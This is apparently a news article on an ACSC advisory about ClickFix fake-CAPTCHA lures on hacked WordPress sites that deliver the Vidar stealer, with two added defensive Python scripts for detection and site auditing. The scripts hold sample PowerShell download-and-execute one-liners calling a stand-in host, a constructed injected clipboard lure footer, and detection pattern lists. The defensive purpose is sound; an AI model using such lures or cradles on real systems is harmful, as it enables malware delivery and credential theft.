
ACSC warns of ClickFix attacks delivering Vidar Stealer via WordPress
The Australian Cyber Security Centre has warned of an active malware campaign that uses fake CAPTCHA prompts on compromised WordPress sites to drop the Vidar information-stealing malware on Australian organisations.

The Australian Cyber Security Centre (ACSC) has issued an advisory on an active campaign in which compromised WordPress sites serve fake CAPTCHA prompts to push the Vidar information stealer onto visitors, with Australian organisations and infrastructure among the targets.
The technique, known as ClickFix, presents visitors to hacked WordPress sites with a fake Cloudflare verification or browser CAPTCHA prompt. The "verification steps" tell the visitor to copy a PowerShell command and run it on their own machine, according to the ACSC advisory. In the publicly documented variants the page's script places the command on the clipboard without the visitor noticing, and the instructions amount to: press Win+R, paste, press Enter.
“The ACSC has observed ClickFix-associated activity leveraging WordPress-hosted infrastructure to distribute the Vidar Stealer malware,” the agency said.
ClickFix differs from conventional phishing in that the victim, not a document macro or a dropped executable, performs the initial execution. Because the payload arrives as text the user pastes into the Run dialog or a console rather than as an attachment or a download, email security gateways and browser download controls have nothing to scan, and the first malicious process is a legitimately signed PowerShell started from the user's own explorer.exe, which many detection rules treat as normal activity. Endpoint telemetry still records the command line, so the technique is detectable, but only where process creation is logged and someone looks at it. Security researchers have documented ClickFix variants disguised as browser update prompts, reCAPTCHA checks and Cloudflare challenge pages.
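The detection point above, worked through as an added example (this is not code from the ACSC advisory, and the events and patterns are constructed for the demo, not the advisory's indicators). It scores Sysmon-style process-creation events and flags a shell only when it is launched from an interactive parent such as explorer.exe (the Win+R case) and its command line, including any -EncodedCommand payload once decoded, contains a download-and-execute cradle or a remote URL. A scheduled script run from a service parent and a user simply opening PowerShell both score zero. The field names follow Sysmon Event ID 1; the parent and cradle lists are assumptions to tune for your environment.

```python
"""Triage Windows process-creation events for ClickFix-style command launches.

Added example for this article, not code from the ACSC advisory. Field names
follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the sample events
and the indicator patterns are constructed heuristics, not the advisory's IoCs.
"""
from __future__ import annotations

import base64
import re

# Where a pasted command usually lands: the Win+R dialog is hosted by explorer.exe,
# otherwise an already-open console. (Assumed list; extend for your environment.)
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Download-and-execute cradles typical of pasted one-liners (generic patterns, assumed).
CRADLES = [
    r"\biex\b", r"invoke-expression", r"\birm\b", r"invoke-restmethod",
    r"\biwr\b", r"invoke-webrequest", r"downloadstring\(", r"frombase64string",
    r"\bmshta\b", r"\bcertutil\b.*-urlcache",
]
# Switches that hide the window or disable policy checks.
EVASION = [r"-w(indowstyle)?\s+hidden", r"-e(p|xecutionpolicy)\s+bypass", r"-nop\b", r"-noni\b"]
URL = re.compile(r"https?://")


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmd: str) -> str:
    """Return the UTF-16LE plaintext of a -e/-enc/-EncodedCommand payload, or ''."""
    m = re.search(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: dict) -> tuple[int, list[str]]:
    """Score one event. A non-zero score needs an interactive launcher AND a
    cradle or remote URL; scripts run from a service parent score 0."""
    image, parent = _basename(ev.get("Image", "")), _basename(ev.get("ParentImage", ""))
    if image not in SHELLS:
        return 0, []
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    text = (cmd + " " + decoded).lower()   # scan the decoded payload as well
    reasons: list[str] = []
    interactive = parent in INTERACTIVE_PARENTS
    if interactive:
        reasons.append(f"{image} spawned by {parent} (Win+R or pasted into a console)")
    cradles = [p for p in CRADLES if re.search(p, text)]
    if cradles:
        reasons.append("download/execute cradle: " + ", ".join(cradles))
    if URL.search(text):
        reasons.append("remote URL in command line")
    evasion = [p for p in EVASION if re.search(p, text)]
    if evasion:
        reasons.append("evasion switch: " + ", ".join(evasion))
    if decoded:
        reasons.append("encoded command decoded and scanned")
    if not (interactive and (cradles or URL.search(text))):
        return 0, reasons
    return len(reasons), reasons


def is_clickfix_like(ev: dict) -> bool:
    return score_event(ev)[0] > 0


def triage(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (CommandLine, reasons) for every event worth an analyst's look."""
    return [(ev["CommandLine"], score_event(ev)[1]) for ev in events if is_clickfix_like(ev)]


# Constructed sample events (not real telemetry). example.invalid is a reserved name.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode("iex (iwr https://example.invalid/verify)".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS,
     "CommandLine": 'powershell -w hidden -ep bypass -c "iex (irm https://example.invalid/check)"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS, "CommandLine": "powershell.exe"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe", "Image": _PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\ProgramData\Patch\apply.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": _PS, "CommandLine": f"powershell -nop -enc {_ENC}"},
]

if __name__ == "__main__":
    for cmdline, why in triage(SAMPLE_EVENTS):
        print(cmdline[:70], "->", "; ".join(why))
```

On a real host the same shape shows up in two other places worth checking during triage: the RunMRU key under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer, which records what was typed into Win+R, and PowerShell script block logging (Event ID 4104), which captures the decoded payload even when the command line was encoded.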
Vidar Stealer launched as a malware-as-a-service offering in late 2018. It harvests browser passwords, cookies, autofill data, cryptocurrency wallets and system information. Once it has collected and exfiltrated that data it deletes its own executable, leaving little on disk for forensic review. Command-and-control addresses are not hard-coded but fetched from dead-drop URLs on public services such as Telegram and Steam profiles; the operator can rotate the C2 server by editing a profile, and defenders cannot block the resolver without blocking the legitimate platform, which makes conventional takedowns difficult. The malware is sold on underground forums for a subscription fee.
The ACSC recommends that organisations restrict PowerShell execution, apply application allow-listing, install WordPress security updates and remove unused themes and plugins. The advisory includes indicators of compromise. One caveat worth stating: PowerShell's execution policy is not a security boundary, since a pasted one-liner can simply pass -ExecutionPolicy Bypass, so restriction means Constrained Language Mode or an AppLocker or WDAC allow-list, not Set-ExecutionPolicy alone.
WordPress administrators should audit installations for unauthorised changes, in particular injected script blocks in theme and plugin files and unfamiliar files under wp-content, review which accounts hold administrative privileges, and keep core, plugin and theme software current. Compromised WordPress sites served as the initial infection vector, the ACSC said.
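The audit of a WordPress tree for unauthorised changes, as an added example (this is not the ACSC's tooling and the sample site is constructed in a temporary directory). It flags a file only when a clipboard write is paired with verification-page lure text or a shell command string, because a clipboard write on its own is what every "copy link" button does; it decodes long base64 blobs before matching, since injected lures are usually wrapped in atob(); and it lists files modified after a known-good baseline. The suffix list, patterns and baseline handling are assumptions to adapt to the site being reviewed.

```python
"""Offline audit of a WordPress tree for injected fake-CAPTCHA (ClickFix) lures.

Added example for this article, not the ACSC's tooling. It walks the site,
flags script content that pairs a clipboard write with verification-page lure
text or a shell command (decoding base64 blobs first, since injected code is
usually wrapped in atob()), and lists files modified after a known-good
baseline. The sample site is constructed in a temp directory; the patterns
are generic assumptions, not the advisory's indicators.
"""
from __future__ import annotations

import base64
import os
import re
import tempfile
import time
from pathlib import Path

SCAN_SUFFIXES = {".php", ".js", ".html"}
CLIPBOARD = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy", re.I)
LURE = re.compile(r"verify (you are|that you're) human|cloudflare|captcha|win\s*\+\s*r\b", re.I)
SHELLISH = re.compile(r"powershell|mshta|cmd(\.exe)?\s*/c|\biex\b|-enc\b", re.I)
B64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")


def _expand_base64(text: str) -> str:
    """Append decoded base64 blobs so an atob()-wrapped payload is matched as plaintext."""
    decoded = []
    for m in B64_BLOB.finditer(text):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8", "ignore"))
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
    return text + "\n" + "\n".join(decoded)


def inspect_file(path: Path) -> list[str]:
    """Name the ClickFix traits present in one file."""
    text = _expand_base64(path.read_text(errors="ignore"))
    hits = []
    if CLIPBOARD.search(text):
        hits.append("clipboard write")
    if LURE.search(text):
        hits.append("verification/CAPTCHA lure text")
    if SHELLISH.search(text):
        hits.append("shell command string")
    return hits


def audit(root: Path, baseline_epoch: float) -> dict[str, list[str]]:
    """Return {relative path: reasons}. A clipboard write alone is normal
    ('copy link' buttons); the pairing with lure text or a command is what
    matters. mtime is only a hint, because an attacker can timestomp it."""
    findings: dict[str, list[str]] = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file() or p.suffix.lower() not in SCAN_SUFFIXES:
            continue
        reasons = []
        hits = inspect_file(p)
        if "clipboard write" in hits and len(hits) > 1:
            reasons.append("ClickFix pattern: " + ", ".join(hits))
        if p.stat().st_mtime > baseline_epoch:
            reasons.append("modified after baseline")
        if reasons:
            findings[p.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_site(root: Path, baseline_epoch: float) -> None:
    """Constructed sample: a clean theme, a benign copy-link script, a genuine
    CAPTCHA plugin, and one footer carrying an injected lure."""
    theme = root / "wp-content" / "themes" / "demo"
    plugin = root / "wp-content" / "plugins" / "captcha-plugin"
    theme.mkdir(parents=True)
    plugin.mkdir(parents=True)
    (theme / "header.php").write_text("<?php wp_head(); ?>\n<div class='site'>\n")
    (theme / "copy-link.js").write_text("btn.onclick = () => navigator.clipboard.writeText(location.href);\n")
    (plugin / "captcha.php").write_text("<?php // renders a genuine CAPTCHA widget\n")
    cmd = 'powershell -w hidden -c "iex (irm https://example.invalid/verify)"'  # example.invalid is reserved
    payload = base64.b64encode(cmd.encode()).decode()
    (theme / "footer.php").write_text(
        "<?php wp_footer(); ?>\n<script>var c=atob('" + payload + "');"
        "navigator.clipboard.writeText(c);"
        "document.body.innerHTML='<h2>Verify you are human</h2>"
        "<p>Press Win + R, then Ctrl + V, then Enter</p>';</script>\n"
    )
    for f in root.rglob("*"):            # everything predates the baseline ...
        if f.is_file():
            os.utime(f, (baseline_epoch - 86400, baseline_epoch - 86400))
    os.utime(theme / "footer.php", (baseline_epoch + 3600, baseline_epoch + 3600))  # ... except the injected file


def run_demo() -> dict[str, list[str]]:
    baseline = time.time()
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_site(root, baseline)
        return audit(root, baseline)


if __name__ == "__main__":
    for path, why in run_demo().items():
        print(path, "->", "; ".join(why))
```

Against a real site, run it with the baseline set to the last known-good deployment time and treat the output as a review queue rather than a verdict; pair it with a comparison of core, theme and plugin files against fresh copies from wordpress.org, and with a review of the users table and any unexpected must-use plugins, since injected footers are only one of the places a compromised site carries its payload.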
The warning is the latest in a series of ACSC alerts as ransomware and information-stealer campaigns increasingly target Australian organisations. Australia recently established a Cyber Incident Review Board under the Cyber Security Act 2024 to conduct no-fault reviews of significant incidents. Organisations that detect a compromise should report it through ACSC channels and consider engaging incident response specialists.
Reza Khalil
Cybersecurity reporter covering breaches, threat intel, and the ACSC beat. Former incident responder. Reports from Canberra.


